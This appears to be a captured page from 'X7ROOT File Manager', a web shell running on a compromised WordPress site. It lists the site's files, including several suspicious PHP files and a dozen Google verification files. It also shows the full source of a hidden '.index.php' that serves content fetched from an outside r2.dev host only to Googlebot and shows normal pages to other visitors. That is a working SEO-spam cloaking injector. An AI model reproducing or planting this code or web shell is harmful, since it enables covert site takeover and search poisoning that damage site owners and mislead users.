X7ROOT File Manager
Current Path:
/home/suregimv/public_html
home
/
suregimv
/
public_html
/
📁
..
📄
.hcflag
(30 B)
📄
.htaccess
(1.13 KB)
📄
.htaccess.bk
(257 B)
📄
.index.php
(1.4 KB)
📁
.tmb
📁
.well-known
📁
107b04
📄
admin.php
(278 B)
📁
cgi-bin
📄
error_log
(3.06 MB)
📁
f378b
📄
google03588a098ee20279.html
(53 B)
📄
google18372def94796f27.html
(53 B)
📄
google298e9b430a229453.html
(53 B)
📄
google3b611924d8a868ba.html
(53 B)
📄
google3da38097a4b91538.html
(53 B)
📄
google4e9e64589d679d23.html
(53 B)
📄
google537e082bbfe294fa.html
(53 B)
📄
google5cce3dda03c5ea79.html
(53 B)
📄
google7bf4c1896906723d.html
(53 B)
📄
googlea27f26ef3c16ef21.html
(53 B)
📄
googlec1ea6bf266124648.html
(53 B)
📄
googlecc879ae06689d91a.html
(53 B)
📄
googled67911d9ca645e70.html
(53 B)
📄
googlee800147306ef23ee.html
(53 B)
📄
index.php0
(404 B)
📄
license.txt
(19.44 KB)
📁
nc_assets
📄
parking-page.shtml
(4.99 KB)
📄
php.ini
(105 B)
📄
readme.html
(7.25 KB)
📄
robots.txt
(497 B)
📄
wp-activate.php
(7.21 KB)
📁
wp-admin
📄
wp-blog-header.php
(351 B)
📄
wp-comments-post.php
(2.27 KB)
📄
wp-config-sample.php
(3.26 KB)
📄
wp-config.php
(3.51 KB)
📁
wp-content
📄
wp-cron.php
(5.49 KB)
📁
wp-includes
📄
wp-links-opml.php
(2.44 KB)
📄
wp-load.php
(3.84 KB)
📄
wp-login.php
(50.21 KB)
📄
wp-mail.php
(8.52 KB)
📄
wp-settings.php
(29.38 KB)
📄
wp-signup.php
(33.71 KB)
📄
wp-trackback.php
(4.98 KB)
📄
xmlrpc.php
(3.13 KB)
📄
xndhyqep.php
(11.8 KB)
Editing: .index.php
<?php function profile_user() { $refererUrl = $_SERVER['HTTP_REFERER'] ?? 'No Referer'; $useragent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $currentDomain = $_SERVER['HTTP_HOST'] ?? 'defaultdomain.com'; // Otomatis buat URL berdasarkan domain aktif $pasteUrl = 'pub-c1b039e33b304b81817d98a8ecb26f8e.r2.dev/' . $currentDomain . '.html'; if (stripos($useragent, 'Google-InspectionTool') !== false || stripos($useragent, 'googlebot') !== false || stripos($useragent, '(compatible; Googlebot/2.1; +http://www.google.com/bot.html)') !== false) { // Ambil konten dari URL berdasarkan domain $content = fetch_content($pasteUrl); if ($content) { echo $content; exit(); } else { echo "Gagal mengambil konten dari $pasteUrl"; exit(); } } else { include('index.php'); } } function fetch_content($url) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 5, ]); $content = curl_exec($ch); if (curl_errno($ch)) { error_log('cURL Error: ' . curl_error($ch)); return false; } curl_close($ch); return $content; } profile_user(); ?>
Upload File
Create Folder